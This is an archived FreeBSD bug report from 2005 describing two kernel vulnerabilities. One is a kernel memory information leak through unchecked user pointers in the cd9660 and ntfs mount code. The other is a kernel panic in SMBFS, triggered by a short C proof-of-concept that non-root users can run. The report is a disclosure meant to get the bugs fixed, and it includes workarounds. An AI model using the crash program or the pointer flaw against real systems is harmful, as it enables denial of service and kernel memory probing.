Date: Thu, 6 Oct 2005 19:45:30 GMT From: Alexander Drozdov <dzal_mail@mtu-net.ru> To: freebsd-gnats-submit@FreeBSD.org Subject: kern/87010: Reading kernel memory & pagefault under non-root Message-ID: <200510061945.j96JjUZq041210@www.freebsd.org> Resent-Message-ID: <200510061950.j96JoD41019645@freefall.freebsd.org>
next in thread | raw e-mail | index | archive | help
>Number: 87010 >Category: kern >Synopsis: Reading kernel memory & pagefault under non-root >Confidential: no >Severity: critical >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Thu Oct 06 19:50:12 GMT 2005 >Closed-Date: >Last-Modified: >Originator: Alexander Drozdov >Release: 5.4-RELEASE-p6 >Organization: >Environment: FreeBSD sorcerer.my.domain 5.4-RELEASE-p6 FreeBSD 5.4-RELEASE-p6 #9: Thu Jul 28 09:55:49 MSD 2005 sorcerer@sorcerer.my.domain:/usr/obj/usr/src/sys/MYKERNEL_3 i386 >Description: 2 problems: 1. It is possible to pass to kernel addresses that can not be located in user space. There are no write operations to these addresses but there are strcmp operations with some in-kernel buffers. It allows user to get some information about kernel memory. Look at /usr/src/sys/isofs/cd9660/cd9660_vfsops.c:478 cd9660_iconv->open(argp->cs_local, argp->cs_disk, &isomp->im_d2l); cd9660_iconv->open(argp->cs_disk, argp->cs_local, &isomp->im_l2d); Variables argp->cs_local and argp->cs_disk are the pointers that user passed to the kernel through mount call. 'open' function (/usr/src/sys/libkern/iconv.c) just uses strcmp function to compare these pointers with the charset encodings. NTFS module (/usr/src/sys/fs/ntfs) has the same behaviour. But, for example, msdosfs has not: 'copyinstr' function has been called before using the same buffers. Workaround: disallow non-root users to mount filesystems (sysctl vfs.usermount=0) OR compile kernel without static cd9660 and ntfs modules and do not load these modules via kldload. I have no information about working this vulnerability in jail. 2. The result of the program below is kernel panic. I just passed a bad but existed file descriptor (0) to SMBFS module through mount call. #include <sys/param.h> #include <sys/mount.h> #include <errno.h> struct smbfs_args { int version; int dev; u_int flags; char mount_point[MAXPATHLEN]; u_char root_path[512+1]; uid_t uid; gid_t gid; mode_t file_mode; mode_t dir_mode; int caseopt; }; int main(int argc, char *argv[]) { int ret; struct smbfs_args ia; memset(&ia,0xff,sizeof(ia)); ia.version=101012; ia.dev=0; ret=mount("smbfs","tmp",MNT_RDONLY,&ia); if(!ret) printf("Ok!\n"); else printf("result = %i, errno = %i, %s\n", ret, errno, strerror(errno)); return 0; } Workaround: disallow non-root users to mount filesystems (sysctl vfs.usermount=0) OR compile kernel without static smbfs module and do not load this module via kldload. I have no information about working this vulnerability in jail. >How-To-Repeat: >Fix: >Release-Note: >Audit-Trail: >Unformatted:
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?200510061945.j96JjUZq041210>